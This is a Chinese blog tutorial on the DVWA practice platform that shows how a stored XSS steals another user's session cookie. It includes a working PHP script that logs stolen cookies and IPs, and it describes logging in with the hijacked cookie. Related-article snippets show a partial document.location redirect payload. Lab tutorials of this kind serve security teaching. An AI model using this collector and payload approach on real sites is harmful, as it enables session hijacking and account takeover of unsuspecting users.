XSS获取Cookie过程简单演示

最新推荐文章于 2024-08-20 10:46:10 发布
最新推荐文章于 2024-08-20 10:46:10 发布
阅读量2.9w 收藏 42
点赞数 6
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36609913/article/details/79066320
版权

XSS:

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

本次演示将通过DVWA平台进行

实例:

打开DVWA的XSS测试模块

这里写图片描述

提交测试能否弹窗

这里写图片描述

没问题 用alert(document.cookie)弹出用户的cookie

这里写图片描述

好的获取到Cookie了文章结束 -:)
/手动滑稽 那么我们怎么才能将获取到的cookie传到自己服务器上来呢

这儿我们要写一段php代码来获取对应的cookie及ip并生成一个cookie.txt的文件来保存得到的cookie

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

我们将php文件放到服务器的web目录下
然后访问一下localhost/getcookie.php?cookie=111测试一下php代码
这里写图片描述
可以看到确实有了访问记录

构造XSS语句将网页插入到里面

这里写图片描述

此处DVWA对Message框做了长度要求 通过HTML改大即可

切换一台虚拟机登录这个页面后该用户的cookie就会自动保存到我的cookie.txt下面

这里写图片描述

接下来就可以直接用他的cookie进行登录了~
EvilGenius-
关注
  • 6
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
DOM型XSS;cookie获取XSS后台使用;XSS钓鱼演示XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2218
DOM型XSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOM型XSS漏洞演示 ...
cookie获取和反射型xss具体案例演示
weixin_44720762的博客
05-01 2630
这篇博客用于介绍XSS的危害以及增加对XSS的理解。 下面对于cookie的介绍来源于百度,我个人认为对cookie的讲解已经很清楚了,方便同学阅读,在这里复制了一些。 cookie介绍: Cookie 可以翻译为“小甜品,小饼干” ,Cookie 在网络系统中几乎无处不在,当我们浏览以前访问过的网站时,网页中可能会出现 :你好 XXX,这会让我们感觉很亲切,就好像吃了一个小甜品一样。这其实是通过...
利用XSS漏洞打cookie
qq_68163788的博客
01-15 1841
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS窃取cookie以及XSSflash攻击钓鱼
C233333235的博客
07-23 370
软件。
简单利用XSS获取用户cookie
shy的博客
10-25 4321
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单演示下,将cookie获取到自己的搭...
XSS获取cookie
qq_40273198的博客
11-21 4614
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
使用XSS漏洞获取cookies
Decaede的博客
01-26 1205
使用XSS漏洞获取cookies
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
XSS漏洞注入及靶场演示
Zeker62的博客
07-28 714
其实SQL注入还没学透,XSS漏洞又开始紧锣密鼓得学起来了。 无奈自学没人指导,看别人写的东西进行一个总结. 这个暑假总要搞掉一些东西 XSS漏洞概述 XSS漏洞——OWASP TOP3 XSS中文名叫跨站脚本攻击,就是在Web页面中在可传入的地方传入一些恶意代码,而并未做到过滤,在用户浏览网页的时候,这些代码被执行,导致用户资料被窃取或者其他事情。 XSS漏洞有三种类型: 反射型:只对本次访问页面有效 存储型:存储到web的数据库中 DOM型:还没接触 例如,在如下代码中 <h1>&l.
Web应用安全:XSS盗取cookiepayload.pptx
06-18
这个脚本通常设计为在用户浏览器中读取Cookie并将其发送给攻击者。以下为攻击步骤: 1. 攻击者在目标网站上注入恶意XSS脚本,例如`<script>document.location='...
httpwebreqeust读取httponly的cookie方法
08-31
然而,有些Cookie被标记为`HttpOnly`,这意味着它们不能通过JavaScript等客户端脚本语言访问,以增加安全性,防止XSS(跨站脚本攻击)对Cookie的窃取。但有时开发者需要在服务器端代码中处理这些`HttpOnly` Cookie,...
xss获取cookie
kiihuang的博客
03-31 886
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS平台获取cookie
qq_41048303的博客
02-19 3619
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
xss -- cookie获取
qq726232111的博客
09-11 689
0x0 cookie 简介 储存在用户本地终端上的数据,服务端可通过session会话获取cookie信息,cookie可用于身份验证,临时存储信息(商城网站的购物车)等 0x1 实验流程 用户点击构造链接 --> 发送cookie到指定服务器 --> 接收cookie保存到文件 0x2 实验环境 实验环境 window+phpstudy+dvwa dvwa中提供...
XSS平台与cookie获取
永远是少年
11-21 1196
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
XSS攻击:获取用户的cookie(get方式)
weixin_43726152的博客
05-06 4017
关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户的cookieXSS实验。 为了和上图数字一致好看些,从序号1开始吧 0x1 用户登入 自行登入。坑自己就可以了,不要坑别人哈。 0x2 找到漏洞点,制作一个危险的url 让前端插入的js是: <script>document.location = 'http://127.0.0.1/pik...
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1208
XSS
XSS获取Cookie实验
最新发布
YhMjQx的博客
08-20 475
blue-lotus利用xss漏洞窃取cookie
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值